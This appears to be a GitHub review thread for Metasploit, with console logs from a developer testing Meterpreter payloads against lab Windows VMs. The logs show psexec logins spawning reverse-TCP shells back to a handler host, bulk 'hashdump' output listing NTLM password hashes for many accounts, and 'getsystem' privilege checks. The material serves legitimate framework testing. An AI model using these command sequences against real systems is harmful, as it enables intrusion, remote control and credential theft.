chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:96811640642b7e8a6465a8d64208da82::: [*] Running 'hashdump' on meterpreter session 16 (10.5.134.151) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:11ba4cb6993d434d8dbba9ba45fd9011::: [*] Running 'hashdump' on meterpreter session 17 (10.5.134.157) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7ee181ddb6556b468f3af0a9036cfa5f::: [*] Running 'hashdump' on meterpreter session 18 (10.5.134.171) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 19 (10.5.134.192) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6e8ef0961855a7312b15a5b80e73c29c::: msf6 exploit(windows/smb/psexec) > sessions -C getsystem [*] Running 'getsystem' on meterpreter session 1 (10.5.134.111) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 2 (10.5.134.132) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 3 (10.5.134.145) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 4 (10.5.134.149) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 5 (10.5.134.150) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 6 (10.5.134.151) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 7 (10.5.134.152) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 8 (10.5.134.157) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 9 (10.5.134.171) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 10 (10.5.134.192) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 11 (10.5.134.111) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 12 (10.5.134.132) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 13 (10.5.134.145) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 14 (10.5.134.149) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 15 (10.5.134.150) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 16 (10.5.134.151) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 17 (10.5.134.157) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 18 (10.5.134.171) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 19 (10.5.134.192) [-] Already running as SYSTEM msf6 exploit(windows/smb/psexec) > ```

bwatters-r7 commented 10 months ago

x86 Payloads on native x86 VMs

:red_circle: Windows 10x86

``` msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:8875 [*] 10.5.134.193:445 - Connecting to the server... [*] 10.5.134.193:445 - Authenticating to 10.5.134.193:445 as user 'vagrant'... [*] 10.5.134.193:445 - Selecting PowerShell target [*] 10.5.134.193:445 - Executing the payload... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.193 [+] 10.5.134.193:445 - Service start timed out, OK if running a command or non-service executable... [*] 10.5.134.193 - Meterpreter session 22 closed. Reason: Died [-] Meterpreter session 21 is not valid and will be closed ```

:red_circle: Windows 8x86

``` msf6 payload(windows/meterpreter/reverse_tcp) > to_handler [*] Payload Handler Started as Job 0 [*] Started reverse TCP handler on 10.5.135.201:4587 msf6 payload(windows/meterpreter/reverse_tcp) > WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.153 [*] 10.5.134.153 - Meterpreter session 25 closed. Reason: Died [-] Meterpreter session 25 is not valid and will be closed WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.124 [*] 10.5.134.124 - Meterpreter session 26 closed. Reason: Died [-] Meterpreter session 26 is not valid and will be closed ```

:green_circle: Windows 7x86

``` msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i -1 [*] Starting interaction with 29... meterpreter > sysinfo Computer : WIN7X86-SP0 OS : Windows 7 (6.1 Build 7600). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.166 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 30 opened (10.5.135.201:4565 -> 10.5.134.166:49164) at 2024-01-16 15:51:21 -0600 meterpreter > background [*] Backgrounding session 29... msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i -1 [*] Starting interaction with 30... meterpreter > sysinfo Computer : WIN7X86-SP1 OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used ```

:green_circle: Windows XP_SP3

``` msf6 payload(windows/meterpreter/reverse_tcp) > WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.132.196 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 28 opened (10.5.135.201:4565 -> 10.5.132.196:1045) at 2024-01-16 15:46:31 -0600 msf6 payload(windows/meterpreter/reverse_tcp) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 28 meterpreter x86/windows A-122D033910404\msfuser @ A-122D033910404 10.5.135.201:4565 -> 10.5.132.196:1045 (10.5.132.19 6) msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i -1 [*] Starting interaction with 28... meterpreter > sysinfo Computer : A-122D033910404 OS : Windows XP (5.1 Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > getuid Server username: A-122D033910404\msfuser ```

bwatters-r7 commented 10 months ago

:green_circle: Windows 10x64

``` msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.111 rhost => 10.5.134.111 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.111:445 - Connecting to the server... [*] 10.5.134.111:445 - Authenticating to 10.5.134.111:445 as user 'vagrant'... [*] 10.5.134.111:445 - Selecting PowerShell target [*] 10.5.134.111:445 - Executing the payload... [+] 10.5.134.111:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.111 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.111:49771) at 2024-01-18 14:12:38 -0600 [*] Session 1 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.132 rhost => 10.5.134.132 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.132:445 - Connecting to the server... [*] 10.5.134.132:445 - Authenticating to 10.5.134.132:445 as user 'vagrant'... [*] 10.5.134.132:445 - Selecting PowerShell target [*] 10.5.134.132:445 - Executing the payload... [+] 10.5.134.132:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.132 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.132:49776) at 2024-01-18 14:12:41 -0600 [*] Session 2 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.145 rhost => 10.5.134.145 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.145:445 - Connecting to the server... [*] 10.5.134.145:445 - Authenticating to 10.5.134.145:445 as user 'vagrant'... [*] 10.5.134.145:445 - Selecting PowerShell target [*] 10.5.134.145:445 - Executing the payload... [+] 10.5.134.145:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.145 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 3 opened (10.5.135.201:4444 -> 10.5.134.145:49741) at 2024-01-18 14:12:46 -0600 [*] Session 3 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.149 rhost => 10.5.134.149 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.149:445 - Connecting to the server... [*] 10.5.134.149:445 - Authenticating to 10.5.134.149:445 as user 'vagrant'... [*] 10.5.134.149:445 - Selecting PowerShell target [*] 10.5.134.149:445 - Executing the payload... [+] 10.5.134.149:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.149 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.134.149:49502) at 2024-01-18 14:12:49 -0600 [*] Session 4 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.150 rhost => 10.5.134.150 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.150:445 - Connecting to the server... [*] 10.5.134.150:445 - Authenticating to 10.5.134.150:445 as user 'vagrant'... [*] 10.5.134.150:445 - Selecting PowerShell target [*] 10.5.134.150:445 - Executing the payload... [+] 10.5.134.150:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.150 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 5 opened (10.5.135.201:4444 -> 10.5.134.150:49911) at 2024-01-18 14:12:52 -0600 [*] Session 5 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.151 rhost => 10.5.134.151 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.151:445 - Connecting to the server... [*] 10.5.134.151:445 - Authenticating to 10.5.134.151:445 as user 'vagrant'... [*] 10.5.134.151:445 - Selecting PowerShell target [*] 10.5.134.151:445 - Executing the payload... [+] 10.5.134.151:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.151 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 6 opened (10.5.135.201:4444 -> 10.5.134.151:49789) at 2024-01-18 14:12:55 -0600 [*] Session 6 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.152 rhost => 10.5.134.152 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.152:445 - Connecting to the server... [*] 10.5.134.152:445 - Authenticating to 10.5.134.152:445 as user 'vagrant'... [*] 10.5.134.152:445 - Selecting PowerShell target [*] 10.5.134.152:445 - Executing the payload... [+] 10.5.134.152:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.152 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 7 opened (10.5.135.201:4444 -> 10.5.134.152:49747) at 2024-01-18 14:12:58 -0600 [*] Session 7 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.157 rhost => 10.5.134.157 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.157:445 - Connecting to the server... [*] 10.5.134.157:445 - Authenticating to 10.5.134.157:445 as user 'vagrant'... [*] 10.5.134.157:445 - Selecting PowerShell target [*] 10.5.134.157:445 - Executing the payload... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.157 [+] 10.5.134.157:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 8 opened (10.5.135.201:4444 -> 10.5.134.157:49791) at 2024-01-18 14:13:01 -0600 [*] Session 8 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.171 rhost => 10.5.134.171 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.171:445 - Connecting to the server... [*] 10.5.134.171:445 - Authenticating to 10.5.134.171:445 as user 'vagrant'... [*] 10.5.134.171:445 - Selecting PowerShell target [*] 10.5.134.171:445 - Executing the payload... [+] 10.5.134.171:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.171 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 9 opened (10.5.135.201:4444 -> 10.5.134.171:49757) at 2024-01-18 14:13:06 -0600 [*] Session 9 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.188 rhost => 10.5.134.188 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.188:445 - Connecting to the server... [*] 10.5.134.188:445 - Authenticating to 10.5.134.188:445 as user 'vagrant'... [*] 10.5.134.188:445 - Selecting PowerShell target [*] 10.5.134.188:445 - Executing the payload... [-] 10.5.134.188:445 - Service failed to start - ACCESS_DENIED [*] Exploit completed, but no session was created. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.192 rhost => 10.5.134.192 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.192:445 - Connecting to the server... [*] 10.5.134.192:445 - Authenticating to 10.5.134.192:445 as user 'vagrant'... [*] 10.5.134.192:445 - Selecting PowerShell target [*] 10.5.134.192:445 - Executing the payload... [+] 10.5.134.192:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used [*] Sending stage (290886 bytes) to 10.5.134.192 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used [*] Meterpreter session 10 opened (10.5.135.201:4444 -> 10.5.134.192:49795) at 2024-01-18 14:13:25 -0600 [*] Session 10 created in the background. msf6 exploit(windows/smb/psexec) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 1 (10.5.134.111) Computer : WIN10X64_1703 OS : Windows 10 (10.0 Build 15063). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 2 (10.5.134.132) Computer : WIN10X64_1803 OS : Windows 10 (10.0 Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 3 (10.5.134.145) Computer : WIN10X64_1511 OS : Windows 10 (10.0 Build 10586). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 4 (10.5.134.149) Computer : WIN10X64 OS : Windows 10 (10.0 Build 10240). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 5 (10.5.134.150) Computer : WIN10X64_1709 OS : Windows 10 (10.0 Build 16299). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 6 (10.5.134.151) Computer : WIN10X64_20H2 OS : Windows 10 (10.0 Build 19042). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 7 (10.5.134.152) Computer : WIN10X64_1809 OS : Windows 10 (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 8 (10.5.134.157) Computer : WIN10X64_2004 OS : Windows 10 (10.0 Build 19041). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 9 (10.5.134.171) Computer : WIN10X64_1607 OS : Windows 10 (10.0 Build 14393). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 10 (10.5.134.192) Computer : WIN10X64_21H1 OS : Windows 10 (10.0 Build 19043). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On 